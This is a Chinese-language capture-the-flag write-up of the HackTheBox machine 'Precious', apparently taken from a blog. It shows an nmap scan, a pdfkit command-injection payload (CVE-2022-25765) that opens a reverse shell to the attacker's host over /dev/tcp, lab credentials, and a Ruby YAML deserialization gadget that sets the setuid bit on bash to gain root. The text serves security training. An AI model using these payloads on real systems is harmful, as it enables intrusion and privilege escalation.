HackTheBox-Machines-Precious
HackTheBox-Machines-Precious
靶场地址
https://app.hackthebox.com/machines/Precious
靶场:10.10.11.189 攻击机: 10.10.14.12
信息收集
使用nmap枚举靶机
nmap 10.10.11.189
C:\Users\admin>nmap 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-13 14:11 中国标准时间
Nmap scan report for 10.10.11.189
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 7.85 seconds
nmap -p22,80 -sC -sV -A 10.10.11.189
C:\Users\admin>nmap -p22,80 -sC -sV -A 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-13 14:12 中国标准时间
NSOCK ERROR [0.5620s] ssl_init_helper(): OpenSSL legacy provider failed to load.Nmap scan report for 10.10.11.189
Host is up (0.28s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 324.00 ms 10.10.14.1
2 323.00 ms 10.10.11.189OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.64 seconds
在nmap扫描时我们发现了域名
http://precious.htb/
将域名写入hosts文件中
echo "10.10.11.189 precious.htb" >> /etc/hosts
然后通过域名访问目标网址
漏洞检测
他的意思是将网页转换为pdf文件格式 我们尝试测试一下利用python开启http服务
python3 -m http.server 80
点击确定进行下载,下载之后看一下文件内容是不是我们python开启的HTTP服务web页面
CVE-2022-25765利用
是了 正是我们利用python开启的HTTP服务web页面 有一个工具exiftools 可以解析pdf文件
然后利用搜索引擎搜索一下此pdfkit漏洞,下面给你们看一看我利用的文档
pdfkit | 中的命令注入CVE-2022-25765 |斯尼克 (snyk.io)
这个poc的意思大概是这样
http://example.com/?name=#{'%20`sleep 5`'}
我们构造自己的poc
http://10.10.16.5?name=#{curl+10.10.16.5}
再次利用python开启http服务
python3 -m http.server 80
进行反弹shell
现在看到了他可以请求便可以进行反弹shell,接下来我们进行尝试反弹shell
构造poc
http://10.10.16.5?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.16.5/9999 0>&1"`'}
nc -lvnp 9999
成功拿到反弹shell,然后进行寻找有用的东西
登录ssh
终于找到了疑似ssh的账号密码
此文件路径
/home/ruby/.bundle
账号:henry 密码:Q3c1AqGHtoI0aXAYFH
成功登录了ssh
成功拿到用户标志,由于太卡所以我kali和window都进行了ssh连接
用户标志: c4c63d132441499866f3042af9c07ea1
YAML反序列化攻击提权
接下来查看能以root权限执行的命令
看一下/opt/update_dependencies.rb 里面有什么内容
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'# TODO: update versions automatically
def update_gems()
enddef list_from_fileYAML.load(File.read("dependencies.yml"))
enddef list_local_gemsGem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
endgems_file = list_from_file
gems_local = list_local_gemsgems_file.each do |file_name, file_version|gems_local.each do |local_name, local_version|if(file_name == local_name)if(file_version != local_version)puts "Installed version differs from the one specified in file: " + local_nameelseputs "Installed version is equals to the one specified in file: " + local_nameendendend
end
看到了YAML.load函数 记得YAML.load函数好像有反序列漏洞 去搜索引擎查找一下
看一下yaml文件内容
---- !ruby/object:Gem::Installeri: x- !ruby/object:Gem::SpecFetcheri: y- !ruby/object:Gem::Requirementrequirements:!ruby/object:Gem::Package::TarReaderio: &1 !ruby/object:Net::BufferedIOio: &1 !ruby/object:Gem::Package::TarReader::Entryread: 0header: "abc"debug_output: &1 !ruby/object:Net::WriteAdaptersocket: &1 !ruby/object:Gem::RequestSetsets: !ruby/object:Net::WriteAdaptersocket: !ruby/module 'Kernel'method_id: :systemgit_set: chmod +s /bin/bashmethod_id: :resolve
然后按照下面的来
henry@precious:~$ cat dependencies.yml
---- !ruby/object:Gem::Installeri: x- !ruby/object:Gem::SpecFetcheri: y- !ruby/object:Gem::Requirementrequirements:!ruby/object:Gem::Package::TarReaderio: &1 !ruby/object:Net::BufferedIOio: &1 !ruby/object:Gem::Package::TarReader::Entryread: 0header: "abc"debug_output: &1 !ruby/object:Net::WriteAdaptersocket: &1 !ruby/object:Gem::RequestSetsets: !ruby/object:Net::WriteAdaptersocket: !ruby/module 'Kernel'method_id: :systemgit_set: chmod +s /bin/bashmethod_id: :resolve
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser henry may run the following commands on precious:(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
Traceback (most recent call last):33: from /opt/update_dependencies.rb:17:in `<main>'32: from /opt/update_dependencies.rb:10:in `list_from_file'31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence'21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `register_empty'20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each'19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `block in register_empty'18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive'13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in `init_with'12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with'11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in `yaml_initialize'10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements'9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in `each'8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from'7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in `read'6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG'5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in `resolve'2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)
henry@precious:~$ ls /bin/bash
/bin/bash
henry@precious:~$ ls /bin/bash -al
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
henry@precious:~$ bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
aaaa792b85c67a8124a1cde1e91395a7
bash-5.1#
成功拿到系统标志
系统标志: aaaa792b85c67a8124a1cde1e91395a7
HackTheBox-Machines-Precious相关推荐
- hackthebox(HTB) precious 靶机!
┌──(root
- HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权
靶机网址: https://app.hackthebox.com/machines/Precious 枚举 使用nmap枚举靶机 nmap -sC -sV 10.10.11.194 机子开放了22,8 ...
- 【网络安全】HTB靶机渗透系列之Sniper
介绍 Sniper是一个中等难度的靶机,知识点涉及本地文件包含利用.远程文件包含利用.凭证制作.恶意chm文件利用等. 通关思维导图 侦查 端口探测 首先使用 nmap 进行端口扫描 nmap -Pn ...
- https://app.hackthebox.com/machines/Squashed
https://app.hackthebox.com/machines/Squashed info collecting ┌──(kwkl㉿kwkl)-[~] └─$ sudo nmap -A 10. ...
- https://app.hackthebox.com/machines/Soccer
https://app.hackthebox.com/machines/Soccer ┌──(kwkl㉿kwkl)-[~] └─$ cat /etc/hosts 1 ⨯ 127.0.0.1 local ...
- https://app.hackthebox.com/machines/Inject
https://app.hackthebox.com/machines/Inject Ref: 1.https://blog.csdn.net/qq_58869808/article/details/ ...
- HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权
题目网址: https://app.hackthebox.com/machines/MetaTwo 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.186 扫到了域名, ...
- HackTheBox Ambassador 枚举获得用户shell,git consul API提权
题目网址: https://app.hackthebox.com/machines/Ambassador 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.183 这次扫 ...
- OpenCV3.3中支持向量机(Support Vector Machines, SVM)实现简介及使用
OpenCV 3.3中给出了支持向量机(Support Vector Machines)的实现,即cv::ml::SVM类,此类的声明在include/opencv2/ml.hpp文件中,实现在mod ...
最新文章
- CSS3学习笔记(一)--2015-12-3
- 信息系统项目管理师需要准备多久?备考技巧分享
- linux解决windows应用程序,关于Linux下使用Windows应用程序的尝试总结
- java textfield事件_[求助]TextField失去焦点触发事件问题
- 蓝桥杯2017初赛-正则问题
- 【转】走进windows编程的世界-----对话框、文本框、按钮
- vue:在router里面给页面加title
- Wijmo 更优美的jQuery UI部件集:在安全站点使用Wijmo控件
- oracle替换指定字符串字符_实例:替换方框内字符串内容
- SCI期刊分区介绍 / 中国科学技术信息研究所SCI(E)论文期刊分区列表——2017年-2020年-文件分享
- java压缩图片大小不改变图片分辨率
- ubuntu安装及使用笔记
- 计算机硬盘按数据传输,同时让多个硬盘轻松同步数据传输
- TestNG 参数化测试
- MapReduce-读取文件写入HBase
- Steam平台——全球最大的游戏平台,现在给大家介绍下steam搬砖项目,这个项目既小众又稳定。
- 相册列表 鼠标悬停显示照片介绍
- 内存卡弹出使用驱动器中的光盘之前需要将其格式化实测解决教程
- DDR4时序标准规范(一)
- 空洞卷积atrous/dilated convolution